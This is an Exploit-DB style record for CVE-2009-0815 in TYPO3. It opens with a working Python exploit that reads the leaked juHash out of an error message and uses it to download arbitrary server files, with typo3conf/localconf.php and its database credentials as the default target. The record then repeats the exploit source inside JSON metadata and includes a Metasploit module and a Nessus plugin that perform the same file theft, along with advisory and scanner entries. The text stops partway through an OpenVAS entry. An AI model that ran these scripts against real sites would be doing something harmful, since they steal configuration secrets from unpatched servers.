#!/usr/bin/env python
#
# ------------------------------------------------------------------------------
# TYPO3-SA-2009-002 exploit by Lolek of TK53 <lolek1337 _at_ gmail.com>
# date: 2009/02/10
# vendor url: http://typo3.org
# vulnerable versions: TYPO3 < 4.2.6, TYPO3 < 4.1.10, TYPO3 < 4.0.12
# usage:
# typo3-sa-2009-002.py <host> <file> (defaults to typo3conf/localconf.php)
#
# if people fixed their installations but did not update the typo3 security key
# you should be able to precompute the hashes if you previously got the security key.
#
# greetings to milw0rm, roflek
import urllib,re,sys
strip = re.compile(r'.*Calculated juHash, ([a-z0-9]+), did not.*')
def useme():
print sys.argv[0], '<host> (with http://) <file> (defaults to typo3conf/localconf.php)'
sys.exit(0)
def parsehash(host, f):
file = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '1:'})
url = host + '/index.php?' + file
try:
s = urllib.urlopen(url)
r = s.read()
except Exception, e:
print '[!] - ', str(e)
return None
tmp = strip.match(r)
if tmp:
return tmp.group(1)
else:
return None
def content(host, hash, f):
file = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '1:', 'juHash' : hash})
url = host + '/index.php?' + file
try:
s = urllib.urlopen(url)
print '[+] - content of:', f
print s.read()
except:
print '[!] - FAIL'
def main():
if len(sys.argv) < 2:
useme()
if len(sys.argv) < 3:
file = 'typo3conf/localconf.php'
else:
file = sys.argv[2]
print '[+] - TYPO3-SA-2009-002 exploit by Lolek of TK53'
print '[+] - checking typo3 installation on...'
hash = parsehash(sys.argv[1], file)
if not hash:
print '[!] - version already fixed or 42 went wrong while trying to get the hash'
sys.exit(234)
content(sys.argv[1], hash, file)
if __name__ == '__main__':
main()
# milw0rm.com [2009-02-10]
{"id": "EDB-ID:8038", "hash": "c7248e8a48e2cba71f8b21e54e3be662", "type": "exploitdb", "bulletinFamily": "exploit", "title": "TYPO3 < 4.0.12/4.1.10/4.2.6 jumpUrl Remote File Disclosure Exploit", "description": "TYPO3 < 4.0.12/4.1.10/4.2.6 (jumpUrl) Remote File Disclosure Exploit. CVE-2009-0815. Webapps exploit for php platform", "published": "2009-02-10T00:00:00", "modified": "2009-02-10T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/8038/", "reporter": "Lolek", "references": [], "cvelist": ["CVE-2009-0815"], "lastseen": "2016-02-01T04:36:59", "history": [], "viewCount": 10, "enchantments": {"score": {"value": 5.6, "vector": "NONE", "modified": "2016-02-01T04:36:59"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-0815"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/HTTP/TYPO3_SA_2009_002"]}, {"type": "dsquare", "idList": ["E-8"]}, {"type": "nessus", "idList": ["TYPO3_JUMPURL_INFO_DISCLOSURE.NASL", "DEBIAN_DSA-1720.NASL", "FREEBSD_PKG_CC47FAFEF82311DD94D90030843D3802.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231063356", "OPENVAS:136141256231063393", "OPENVAS:1361412562310803989", "OPENVAS:63356", "OPENVAS:63393"]}, {"type": "freebsd", "idList": ["CC47FAFE-F823-11DD-94D9-0030843D3802"]}], "modified": "2016-02-01T04:36:59"}, "vulnersScore": 5.6}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/8038/", "sourceData": "#!/usr/bin/env python\r\n#\r\n# ------------------------------------------------------------------------------\r\n# TYPO3-SA-2009-002 exploit by Lolek of TK53 <lolek1337 _at_ gmail.com>\r\n# date: 2009/02/10\r\n# vendor url: http://typo3.org\r\n# vulnerable versions: TYPO3 < 4.2.6, TYPO3 < 4.1.10, TYPO3 < 4.0.12\r\n# usage:\r\n# typo3-sa-2009-002.py <host> <file> (defaults to typo3conf/localconf.php)\r\n#\r\n# if people fixed their installations but did not update the typo3 security key\r\n# you should be able to precompute the hashes if you previously got the security key.\r\n#\r\n# greetings to milw0rm, roflek\r\n\r\nimport urllib,re,sys\r\n\r\nstrip = re.compile(r'.*Calculated juHash, ([a-z0-9]+), did not.*')\r\n\r\ndef useme():\r\n print sys.argv[0], '<host> (with http://) <file> (defaults to typo3conf/localconf.php)'\r\n sys.exit(0)\r\n\r\ndef parsehash(host, f):\r\n file = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '1:'})\r\n url = host + '/index.php?' + file\r\n try:\r\n s = urllib.urlopen(url)\r\n r = s.read()\r\n except Exception, e:\r\n print '[!] - ', str(e)\r\n return None\r\n\r\n tmp = strip.match(r)\r\n if tmp:\r\n return tmp.group(1)\r\n else:\r\n return None\r\n\r\ndef content(host, hash, f):\r\n file = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '1:', 'juHash' : hash})\r\n url = host + '/index.php?' + file\r\n try:\r\n s = urllib.urlopen(url)\r\n print '[+] - content of:', f\r\n print s.read()\r\n except:\r\n print '[!] - FAIL'\r\n\r\ndef main():\r\n if len(sys.argv) < 2:\r\n useme()\r\n\r\n if len(sys.argv) < 3:\r\n file = 'typo3conf/localconf.php'\r\n else:\r\n file = sys.argv[2]\r\n\r\n print '[+] - TYPO3-SA-2009-002 exploit by Lolek of TK53'\r\n print '[+] - checking typo3 installation on...'\r\n\r\n hash = parsehash(sys.argv[1], file)\r\n\r\n if not hash:\r\n print '[!] - version already fixed or 42 went wrong while trying to get the hash'\r\n sys.exit(234)\r\n\r\n content(sys.argv[1], hash, file)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n# milw0rm.com [2009-02-10]\r\n", "osvdbidlist": ["52048"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:57", "bulletinFamily": "NVD", "description": "The jumpUrl mechanism in class.tslib_fe.php in TYPO3 3.3.x through 3.8.x, 4.0 before 4.0.12, 4.1 before 4.1.10, 4.2 before 4.2.6, and 4.3alpha1 leaks a hash secret (juHash) in an error message, which allows remote attackers to read arbitrary files by including the hash in a request.", "modified": "2010-04-27T04:00:00", "id": "CVE-2009-0815", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0815", "published": "2009-03-05T02:30:00", "title": "CVE-2009-0815", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "metasploit": [{"lastseen": "2019-11-20T23:08:03", "bulletinFamily": "exploit", "description": "This module exploits a file disclosure vulnerability in the jumpUrl mechanism of Typo3. This flaw can be used to read any file that the web server user account has access to.\n", "modified": "2017-07-24T13:26:21", "published": "2009-03-15T02:32:34", "id": "MSF:AUXILIARY/ADMIN/HTTP/TYPO3_SA_2009_002", "href": "", "type": "metasploit", "title": "Typo3 sa-2009-002 File Disclosure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Typo3 sa-2009-002 File Disclosure',\n 'Description' => %q{\n This module exploits a file disclosure vulnerability in the jumpUrl mechanism of\n Typo3. This flaw can be used to read any file that the web server user account has\n access to.\n\n },\n 'Author' => [ 'spinbad <spinbad.security[at]googlemail.com>' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['OSVDB', '52048'],\n ['CVE', '2009-0815'],\n ['URL', 'http://secunia.com/advisories/33829/'],\n ['EDB', '8038'],\n ['URL', 'http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/'],\n ],\n 'DisclosureDate' => 'Feb 10 2009',\n 'Actions' =>\n [\n ['Download']\n ],\n 'DefaultAction' => 'Download'\n ))\n\n register_options(\n [\n OptString.new('URI', [true, \"Typo3 Path\", \"/\"]),\n OptString.new('RFILE', [true, \"The remote file to download\", 'typo3conf/localconf.php']),\n OptString.new('LFILE',[true, \"The local filename to store the data\", \"localconf.php\"]),\n ])\n end\n\n def run\n print_status(\"Establishing a connection to the target...\")\n\n error_uri = datastore['URI'] + \"/index.php?jumpurl=\" +datastore['RFILE'] +\"&juSecure=1&type=0&locationData=1:\"\n ju_hash = nil\n\n res = send_request_raw({\n 'uri' => error_uri,\n 'method' => 'GET',\n 'headers' =>\n {\n 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',\n 'Connection' => 'Close',\n }\n }, 25)\n\n if (res and res.message == \"OK\")\n res.body =~ /jumpurl Secure: Calculated juHash, ((\\w)+), did not match the submitted juHash./\n\n if $1.nil?\n print_error(\"Error while getting juHash. Maybe the version is already patched...\")\n return\n end\n\n ju_hash = $1\n print_status(\"Getting juHash from error message: #{ju_hash}\")\n\n else\n print_error(\"No response from the server.\")\n return\n end\n\n\n file_uri = datastore['URI'] + \"/index.php?jumpurl=\" +datastore['RFILE'] +\"&juSecure=1&type=0&juHash=#{ju_hash}&locationData=1:\"\n print_status(\"Trying to get #{datastore['RFILE']}.\")\n\n file = send_request_raw({\n 'uri' => file_uri,\n 'method' => 'GET',\n 'headers' =>\n {\n 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',\n 'Connection' => 'Close',\n }\n },25)\n\n if (file and file.message = \"OK\")\n if file.body == 'jumpurl Secure: \"' + datastore['RFILE'] + '\" was not a valid file!'\n print_error(\"File #{datastore['RFILE']} does not exist.\")\n return\n end\n\n print_status(\"Writing local file #{datastore['LFILE']}.\")\n open(datastore['LFILE'],'w') {|f| f << file.body }\n else\n print_error(\"Error while getting file.\")\n end\n\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/typo3_sa_2009_002.rb"}], "dsquare": [{"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "description": "type a short description of the vulnerability here\n\nVulnerability Type: File Disclosure", "modified": "2013-04-02T00:00:00", "published": "2012-01-26T00:00:00", "id": "E-8", "href": "", "type": "dsquare", "title": "Typo3 FD", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2019-12-13T09:44:24", "bulletinFamily": "scanner", "description": "The ", "modified": "2019-12-02T00:00:00", "id": "TYPO3_JUMPURL_INFO_DISCLOSURE.NASL", "href": "https://www.tenable.com/plugins/nessus/35655", "published": "2009-02-12T00:00:00", "title": "TYPO3 'jumpUrl' Mechanism Information Disclosure", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35655);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/11/15 20:50:19\");\n\n script_cve_id(\"CVE-2009-0815\");\n script_bugtraq_id(33714);\n script_xref(name:\"EDB-ID\", value:\"8038\");\n\n script_name(english:\"TYPO3 'jumpUrl' Mechanism Information Disclosure\");\n script_summary(english:\"Attempts to read 'typo3conf/localconf.php'.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that is affected by an\ninformation disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The 'jumpUrl' mechanism in the version of TYPO3 installed on the\nremote host, which is used to track access, exposes the value of a\nhash secret used to validate requests. An unauthenticated, remote\nattacker can leverage this issue to view the contents of arbitrary\nfiles on the remote host subject to the privileges of the web server\nuser id.\");\n # https://typo3.org/security/advisory/typo3-sa-2009-002/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6fdf4cd6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to TYPO3 version 4.0.12 / 4.1.10 / 4.2.6 or later, or patch\nthe installation as discussed in the project's advisory referenced\nabove.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Typo3 FD\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\nscript_cwe_id(200);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/02/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:typo3:typo3\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"typo3_detect.nasl\");\n script_require_keys(\"installed_sw/TYPO3\",\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\ninclude(\"url_func.inc\");\ninclude(\"data_protection.inc\");\n\napp = \"TYPO3\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\ndir = install['path'];\ninstall_url = build_url(qs:dir, port:port);\n\n# file = \"/etc/passwd\";\n# file_pat = \"root:.*:0:[01]:\";\nfile = \"typo3conf/localconf.php\";\nfile_pat = \"\\$typo_db_(password|username) *=\";\n\n# Call up the registration page.\nurl =\n \"/?\" +\n \"jumpurl=\" + urlencode(str:file) + \"&\" +\n \"juSecure=1&\" +\n \"type=0&\" +\n \"locationData=\" + urlencode(str:\"3:\");\n\nres = http_send_recv3(method:\"GET\", item:dir+url, port:port, exit_on_fail:TRUE);\n\n# Grab the hash.\njuhash = NULL;\n\npat = \"Calculated juHash, ([a-z0-9]+), did not\";\nmatches = egrep(pattern:pat, string:res[2]);\nif (matches)\n{\n foreach match (split(matches, keep:FALSE))\n {\n item = eregmatch(pattern:pat, string:match);\n if (!empty_or_null(item[1]))\n {\n juhash = item[1];\n break;\n }\n }\n}\nif (empty_or_null(juhash)) exit(0, \"Unable to extract juHash from \"+ install_url + url);\n\n# Now read the file.\nurl2 = url + \"&juHash=\" + juhash;\n\nres2 = http_send_recv3(method:\"GET\", item:dir+url2, port:port, exit_on_fail:TRUE);\n\n# There's a problem if we see the expected contents.\nif (egrep(pattern:file_pat, string:res2[2]))\n{\n if (report_verbosity > 0)\n {\n res2[2] = data_protection::redact_etc_passwd(output:res2[2]);\n report =\n '\\n' + 'Nessus was able to exploit the issue to retrieve the contents of' +\n '\\n' + \"'\" + file + \"'\" + ' on the remote host using the following URLs :' +\n '\\n' +\n '\\n' + ' ' + install_url + url + \n '\\n' + ' ' + install_url + url2 + \n '\\n';\n if (report_verbosity > 1)\n {\n snip = crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30);\n report +=\n '\\n' + 'Here are its contents :\\n' +\n '\\n' + snip +\n res2[2] + '\\n' +\n snip;\n }\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-13T06:51:05", "bulletinFamily": "scanner", "description": "Several remote vulnerabilities have been discovered in the TYPO3 web\ncontent management framework.\n\nMarcus Krause and Michael Stucki from the TYPO3 security team\ndiscovered that the jumpUrl mechanism discloses secret hashes enabling\na remote attacker to bypass access control by submitting the correct\nvalue as a URL parameter and thus being able to read the content of\narbitrary files.\n\nJelmer de Hen and Dmitry Dulepov discovered multiple cross-site\nscripting vulnerabilities in the backend user interface allowing\nremote attackers to inject arbitrary web script or HTML.\n\nAs it is very likely that your encryption key has been exposed we\nstrongly recommend to change your encryption key via the install tool\nafter installing the update.", "modified": "2019-12-02T00:00:00", "id": "DEBIAN_DSA-1720.NASL", "href": "https://www.tenable.com/plugins/nessus/35638", "published": "2009-02-12T00:00:00", "title": "Debian DSA-1720-1 : typo3-src - several vulnerabilities", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1720. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35638);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/08/02 13:32:21\");\n\n script_cve_id(\"CVE-2009-0815\", \"CVE-2009-0816\");\n script_xref(name:\"DSA\", value:\"1720\");\n\n script_name(english:\"Debian DSA-1720-1 : typo3-src - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in the TYPO3 web\ncontent management framework.\n\nMarcus Krause and Michael Stucki from the TYPO3 security team\ndiscovered that the jumpUrl mechanism discloses secret hashes enabling\na remote attacker to bypass access control by submitting the correct\nvalue as a URL parameter and thus being able to read the content of\narbitrary files.\n\nJelmer de Hen and Dmitry Dulepov discovered multiple cross-site\nscripting vulnerabilities in the backend user interface allowing\nremote attackers to inject arbitrary web script or HTML.\n\nAs it is very likely that your encryption key has been exposed we\nstrongly recommend to change your encryption key via the install tool\nafter installing the update.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514713\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1720\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the typo3 package.\n\nFor the stable distribution (etch) these problems have been fixed in\nversion 4.0.2+debian-8.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Typo3 FD\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_cwe_id(79, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:typo3-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/03/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/02/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"typo3\", reference:\"4.0.2+debian-8\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"typo3-src-4.0\", reference:\"4.0.2+debian-8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-13T07:32:14", "bulletinFamily": "scanner", "description": "Secunia reports :\n\nSome vulnerabilities have been reported in Typo3, which can be\nexploited by malicious people to conduct cross-site scripting attacks\nand disclose sensitive information.\n\nInput passed via unspecified fields to the backend user interface is\nnot properly sanitised before being returned to the user. This can be\nexploited to execute arbitrary HTML and script code in a user", "modified": "2019-12-02T00:00:00", "id": "FREEBSD_PKG_CC47FAFEF82311DD94D90030843D3802.NASL", "href": "https://www.tenable.com/plugins/nessus/35641", "published": "2009-02-12T00:00:00", "title": "FreeBSD : typo3 -- XSS and information disclosure (cc47fafe-f823-11dd-94d9-0030843d3802)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35641);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2019/08/02 13:32:40\");\n\n script_cve_id(\"CVE-2009-0815\", \"CVE-2009-0816\");\n script_xref(name:\"Secunia\", value:\"33829\");\n\n script_name(english:\"FreeBSD : typo3 -- XSS and information disclosure (cc47fafe-f823-11dd-94d9-0030843d3802)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Secunia reports :\n\nSome vulnerabilities have been reported in Typo3, which can be\nexploited by malicious people to conduct cross-site scripting attacks\nand disclose sensitive information.\n\nInput passed via unspecified fields to the backend user interface is\nnot properly sanitised before being returned to the user. This can be\nexploited to execute arbitrary HTML and script code in a user's\nbrowser session in context of an affected site.\n\nAn error in the 'jumpUrl' mechanism can be exploited to read arbitrary\nfiles from local resources by disclosing a hash secret used to\nrestrict file access.\"\n );\n # http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e6914b0f\"\n );\n # https://vuxml.freebsd.org/freebsd/cc47fafe-f823-11dd-94d9-0030843d3802.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c0497b0f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Typo3 FD\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_cwe_id(79, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:typo3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/02/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/02/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"typo3<4.2.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:17", "bulletinFamily": "unix", "description": "\nSecunia reports:\n\nSome vulnerabilities have been reported in Typo3, which can be\n\t exploited by malicious people to conduct cross-site scripting attacks\n\t and disclose sensitive information.\nInput passed via unspecified fields to the backend user interface\n\t is not properly sanitised before being returned to the user. This can\n\t be exploited to execute arbitrary HTML and script code in a user's\n\t browser session in context of an affected site.\nAn error in the \"jumpUrl\" mechanism can be exploited to read\n\t arbitrary files from local resources by disclosing a hash secret used\n\t to restrict file access.\n\n", "modified": "2010-05-02T00:00:00", "published": "2009-02-10T00:00:00", "id": "CC47FAFE-F823-11DD-94D9-0030843D3802", "href": "https://vuxml.freebsd.org/freebsd/cc47fafe-f823-11dd-94d9-0030843d3802.html", "title": "typo3 -- cross-site scripting and information disclosure", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2017-07-24T12:56:43", "bulletinFamily": "scanner", "description": "The remote host is missing an update to typo3-src\nannounced via advisory DSA 1720-1.", "modified": "2017-07-07T00:00:00", "published": "2009-02-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63393", "id": "OPENVAS:63393", "title": "Debian Security Advisory DSA 1720-1 (typo3-src)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1720_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1720-1 (typo3-src)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in the TYPO3 web\ncontent management framework.\n\nMarcus Krause and Michael Stucki from the TYPO3 security team\ndiscovered that the jumpUrl mechanism discloses secret hashes enabling\na remote attacker to bypass access control by submitting the correct\nvalue as a URL parameter and thus being able to read the content of\narbitrary files.\n\nJelmer de Hen and Dmitry Dulepov discovered multiple cross-site\nscripting vulnerabilities in the backend user interface allowing\nremote attackers to inject arbitrary web script or HTML.\n\nAs it is very likely that your encryption key has been exposed we\nstrongly recommend to change your 